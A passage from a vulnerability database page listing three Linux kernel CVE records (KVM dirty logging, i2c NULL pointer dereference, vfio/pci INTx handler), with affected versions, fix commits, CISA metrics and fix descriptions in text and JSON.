Affected: 5982a5392663b30f57ee90b0372c19a7e9cb655a , < 2673dfb591a359c75080dd5af3da484b89320d22 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26990",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-14T20:04:24.835393Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-14T20:04:34.681Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:15:35.930Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cdf811a937471af2d1facdf8ae80e5e68096f1ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e20bff0f1b2de9cfe303dd35ff46470104a87404"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2673dfb591a359c75080dd5af3da484b89320d22"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/mmu/tdp_mmu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cdf811a937471af2d1facdf8ae80e5e68096f1ed",
              "status": "affected",
              "version": "5982a5392663b30f57ee90b0372c19a7e9cb655a",
              "versionType": "git"
            },
            {
              "lessThan": "e20bff0f1b2de9cfe303dd35ff46470104a87404",
              "status": "affected",
              "version": "5982a5392663b30f57ee90b0372c19a7e9cb655a",
              "versionType": "git"
            },
            {
              "lessThan": "2673dfb591a359c75080dd5af3da484b89320d22",
              "status": "affected",
              "version": "5982a5392663b30f57ee90b0372c19a7e9cb655a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/mmu/tdp_mmu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/mmu: Write-protect L2 SPTEs in TDP MMU when clearing dirty status\n\nCheck kvm_mmu_page_ad_need_write_protect() when deciding whether to\nwrite-protect or clear D-bits on TDP MMU SPTEs, so that the TDP MMU\naccounts for any role-specific reasons for disabling D-bit dirty logging.\n\nSpecifically, TDP MMU SPTEs must be write-protected when the TDP MMU is\nbeing used to run an L2 (i.e. L1 has disabled EPT) and PML is enabled.\nKVM always disables PML when running L2, even when L1 and L2 GPAs are in\nthe some domain, so failing to write-protect TDP MMU SPTEs will cause\nwrites made by L2 to not be reflected in the dirty log.\n\n[sean: massage shortlog and changelog, tweak ternary op formatting]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:37.440Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cdf811a937471af2d1facdf8ae80e5e68096f1ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/e20bff0f1b2de9cfe303dd35ff46470104a87404"
        },
        {
          "url": "https://git.kernel.org/stable/c/2673dfb591a359c75080dd5af3da484b89320d22"
        }
      ],
      "title": "KVM: x86/mmu: Write-protect L2 SPTEs in TDP MMU when clearing dirty status",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26990",
    "datePublished": "2024-05-01T05:27:48.810Z",
    "dateReserved": "2024-02-19T14:20:24.205Z",
    "dateUpdated": "2025-11-04T17:15:35.930Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35984 (GCVE-0-2024-35984)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:47 – Updated: 2025-05-04 09:09

Title

i2c: smbus: fix NULL function pointer dereference

Summary

In the Linux kernel, the following vulnerability has been resolved: i2c: smbus: fix NULL function pointer dereference Baruch reported an OOPS when using the designware controller as target only. Target-only modes break the assumption of one transfer function always being available. Fix this by always checking the pointer in __i2c_transfer. [wsa: dropped the simplification in core-smbus to avoid theoretical regressions]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/40f1d79f07b49c8a6…
	https://git.kernel.org/stable/c/ad3c3ac7a03be3697…
	https://git.kernel.org/stable/c/5fd72404587d7db4a…
	https://git.kernel.org/stable/c/5a09eae9a7db597fe…
	https://git.kernel.org/stable/c/4e75e222d397c6752…
	https://git.kernel.org/stable/c/e3425674ff68dc521…
	https://git.kernel.org/stable/c/357c64ef1ef39b1e7…
	https://git.kernel.org/stable/c/91811a31b68d3765b…

Impacted products

Vendor

Product

Version

Linux

Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < 40f1d79f07b49c8a64a861706e5163f2db4bd95d (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < ad3c3ac7a03be3697114f781193dd3e9d97e6e23 (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < 5fd72404587d7db4acb2d241fd8c387afb0a7aec (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < 5a09eae9a7db597fe0c1fc91636205b4a25d2620 (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < 4e75e222d397c6752b229ed72fc4644c8c36ecde (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < e3425674ff68dc521c57c6eabad0cbd20a027d85 (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < 357c64ef1ef39b1e7cd91ab6bdd304d043702c83 (git)
Affected: 63453b59e41173241c4efe9335815f6432fa8586 , < 91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f (git)

Linux

Affected: 4.19
Unaffected: 0 , < 4.19 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35984",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T15:11:46.719693Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:32.705Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.037Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/40f1d79f07b49c8a64a861706e5163f2db4bd95d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ad3c3ac7a03be3697114f781193dd3e9d97e6e23"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5fd72404587d7db4acb2d241fd8c387afb0a7aec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5a09eae9a7db597fe0c1fc91636205b4a25d2620"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4e75e222d397c6752b229ed72fc4644c8c36ecde"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3425674ff68dc521c57c6eabad0cbd20a027d85"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/357c64ef1ef39b1e7cd91ab6bdd304d043702c83"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/i2c/i2c-core-base.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "40f1d79f07b49c8a64a861706e5163f2db4bd95d",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "ad3c3ac7a03be3697114f781193dd3e9d97e6e23",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "5fd72404587d7db4acb2d241fd8c387afb0a7aec",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "5a09eae9a7db597fe0c1fc91636205b4a25d2620",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "4e75e222d397c6752b229ed72fc4644c8c36ecde",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "e3425674ff68dc521c57c6eabad0cbd20a027d85",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "357c64ef1ef39b1e7cd91ab6bdd304d043702c83",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            },
            {
              "lessThan": "91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f",
              "status": "affected",
              "version": "63453b59e41173241c4efe9335815f6432fa8586",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/i2c/i2c-core-base.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.19"
            },
            {
              "lessThan": "4.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c: smbus: fix NULL function pointer dereference\n\nBaruch reported an OOPS when using the designware controller as target\nonly. Target-only modes break the assumption of one transfer function\nalways being available. Fix this by always checking the pointer in\n__i2c_transfer.\n\n[wsa: dropped the simplification in core-smbus to avoid theoretical regressions]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:50.767Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/40f1d79f07b49c8a64a861706e5163f2db4bd95d"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad3c3ac7a03be3697114f781193dd3e9d97e6e23"
        },
        {
          "url": "https://git.kernel.org/stable/c/5fd72404587d7db4acb2d241fd8c387afb0a7aec"
        },
        {
          "url": "https://git.kernel.org/stable/c/5a09eae9a7db597fe0c1fc91636205b4a25d2620"
        },
        {
          "url": "https://git.kernel.org/stable/c/4e75e222d397c6752b229ed72fc4644c8c36ecde"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3425674ff68dc521c57c6eabad0cbd20a027d85"
        },
        {
          "url": "https://git.kernel.org/stable/c/357c64ef1ef39b1e7cd91ab6bdd304d043702c83"
        },
        {
          "url": "https://git.kernel.org/stable/c/91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f"
        }
      ],
      "title": "i2c: smbus: fix NULL function pointer dereference",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35984",
    "datePublished": "2024-05-20T09:47:51.738Z",
    "dateReserved": "2024-05-17T13:50:33.145Z",
    "dateUpdated": "2025-05-04T09:09:50.767Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26812 (GCVE-0-2024-26812)

Vulnerability from cvelistv5 – Published: 2024-04-05 08:24 – Updated: 2025-05-04 08:57

Title

vfio/pci: Create persistent INTx handler

Summary

In the Linux kernel, the following vulnerability has been resolved: vfio/pci: Create persistent INTx handler A vulnerability exists where the eventfd for INTx signaling can be deconfigured, which unregisters the IRQ handler but still allows eventfds to be signaled with a NULL context through the SET_IRQS ioctl or through unmask irqfd if the device interrupt is pending. Ideally this could be solved with some additional locking; the igate mutex serializes the ioctl and config space accesses, and the interrupt handler is unregistered relative to the trigger, but the irqfd path runs asynchronous to those. The igate mutex cannot be acquired from the atomic context of the eventfd wake function. Disabling the irqfd relative to the eventfd registration is potentially incompatible with existing userspace. As a result, the solution implemented here moves configuration of the INTx interrupt handler to track the lifetime of the INTx context object and irq_type configuration, rather than registration of a particular trigger eventfd. Synchronization is added between the ioctl path and eventfd_signal() wrapper such that the eventfd trigger can be dynamically updated relative to in-flight interrupts or irqfd callbacks.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b18fa894d615c8527…
	https://git.kernel.org/stable/c/27d40bf72dd9a6600…
	https://git.kernel.org/stable/c/4cb0d7532126d2314…
	https://git.kernel.org/stable/c/7d29d4c72c1e196cc…
	https://git.kernel.org/stable/c/69276a555c740acfb…
	https://git.kernel.org/stable/c/4c089cefe30924fbe…
	https://git.kernel.org/stable/c/0e09cf81959d9f12b…
	https://git.kernel.org/stable/c/18c198c96a815c962…

Impacted products

Vendor

Product

Version

Linux

Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < b18fa894d615c8527e15d96b76c7448800e13899 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 27d40bf72dd9a6600b76ad05859176ea9a1b4897 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 4cb0d7532126d23145329826c38054b4e9a05e7c (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 7d29d4c72c1e196cce6969c98072a272d1a703b3 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 69276a555c740acfbff13fb5769ee9c92e1c828e (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 4c089cefe30924fbe20dd1ee92774ea1f5eca834 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 0e09cf81959d9f12b75ad5c6dd53d237432ed034 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 18c198c96a815c962adc2b9b77909eec0be7df4d (git)

Linux

Affected: 3.6
Unaffected: 0 , < 3.6 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26812",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-05T14:00:34.055358Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:20:45.884Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.527Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b18fa894d615c8527e15d96b76c7448800e13899"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/27d40bf72dd9a6600b76ad05859176ea9a1b4897"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4cb0d7532126d23145329826c38054b4e9a05e7c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d29d4c72c1e196cce6969c98072a272d1a703b3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/69276a555c740acfbff13fb5769ee9c92e1c828e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4c089cefe30924fbe20dd1ee92774ea1f5eca834"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0e09cf81959d9f12b75ad5c6dd53d237432ed034"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/18c198c96a815c962adc2b9b77909eec0be7df4d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/pci/vfio_pci_intrs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b18fa894d615c8527e15d96b76c7448800e13899",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "27d40bf72dd9a6600b76ad05859176ea9a1b4897",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "4cb0d7532126d23145329826c38054b4e9a05e7c",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "7d29d4c72c1e196cce6969c98072a272d1a703b3",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "69276a555c740acfbff13fb5769ee9c92e1c828e",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "4c089cefe30924fbe20dd1ee92774ea1f5eca834",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "0e09cf81959d9f12b75ad5c6dd53d237432ed034",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "18c198c96a815c962adc2b9b77909eec0be7df4d",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/pci/vfio_pci_intrs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.6"
            },
            {
              "lessThan": "3.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Create persistent INTx handler\n\nA vulnerability exists where the eventfd for INTx signaling can be\ndeconfigured, which unregisters the IRQ handler but still allows\neventfds to be signaled with a NULL context through the SET_IRQS ioctl\nor through unmask irqfd if the device interrupt is pending.\n\nIdeally this could be solved with some additional locking; the igate\nmutex serializes the ioctl and config space accesses, and the interrupt\nhandler is unregistered relative to the trigger, but the irqfd path\nruns asynchronous to those.  The igate mutex cannot be acquired from the\natomic context of the eventfd wake function.  Disabling the irqfd\nrelative to the eventfd registration is potentially incompatible with\nexisting userspace.\n\nAs a result, the solution implemented here moves configuration of the\nINTx interrupt handler to track the lifetime of the INTx context object\nand irq_type configuration, rather than registration of a particular\ntrigger eventfd.  Synchronization is added between the ioctl path and\neventfd_signal() wrapper such that the eventfd trigger can be\ndynamically updated relative to in-flight interrupts or irqfd callbacks."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:57:07.696Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
